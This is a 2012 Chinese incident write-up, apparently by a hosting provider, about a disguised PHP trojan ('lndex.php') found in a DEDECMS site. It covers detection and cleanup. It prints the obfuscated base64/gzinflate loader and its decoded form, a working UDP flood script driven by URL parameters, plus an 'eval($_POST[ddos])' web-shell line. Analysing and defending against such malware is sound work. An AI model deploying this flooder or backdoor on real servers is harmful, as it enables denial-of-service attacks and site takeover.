中国稳网用户

警惕UDP攻击型PHP木马

来源:   作者:   日期:2012-12-11
分享到:
最近有几台虚拟主机遭受Ddos攻击 刚开始以为是客户站点有问题导致攻击 后来发现是一个PHP文件导致

说说过程:
1.利用MRTG监控 发现网卡流量100M 狂丢包 偶尔通几个包
2.SSH登录服务器 用iftop统计是哪个IP流量最高
3.iptables -I INPUT -s 1.1.1.1 -j DROP
4.cat /var/log/httpd/access_log |grep 1.1.1.1
5.发现DEDECMS的plus目录下有一个lndex.php 访问地址为/plus/lndex.php?ip=1.1.1.1&port=80&time=600
6.lndex.php代码为
  1. <?php
  2. /*
  3. gl

  5. */
  6. eval(gzinflate(base64_decode('
  7. DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
  8. 6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
  9. VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
  10. ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
  11. wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
  12. 3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
  13. 3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
  14. xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
  15. SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
  16. e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
  17. bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
  18. hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
复制代码

7.经破解的代码为
  1. <?php


  4. $packets = 0;
  5. $ip = $_GET[\'ip\'];
  6. $rand = $_GET[\'port\'];
  7. set_time_limit(0);
  8. ignore_user_abort(FALSE);

  10. $exec_time = $_GET[\'time\'];

  12. $time = time();
  13. print \"Flooded: $ip on port $rand <br><br>\";
  14. $max_time = $time+$exec_time;


  17. for($i=0;$i<65535;$i++){
  18. $out .= \"X\";
  19. }
  20. while(1){
  21. $packets++;
  22. if(time() > $max_time){
  23. break;
  24. }

  26. $fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
  27. if($fp){
  28. fwrite($fp, $out);
  29. fclose($fp);
  30. }
  31. }
  32. echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
  33. ?>
  34. <?php eval($_POST[ddos])?>
复制代码

8.也就是说只要访问网站的/plus/lndex.php?ip=1.1.1.1&port=80&time=600 就会UDP攻击1.1.1.1
9.关闭网站 修复DEDECMS漏洞 php.ini 修改allow_url_fopen = Off 或者是用iptables封掉UDP


推荐 】 【 打印

中国稳网 版权所有 wendns.com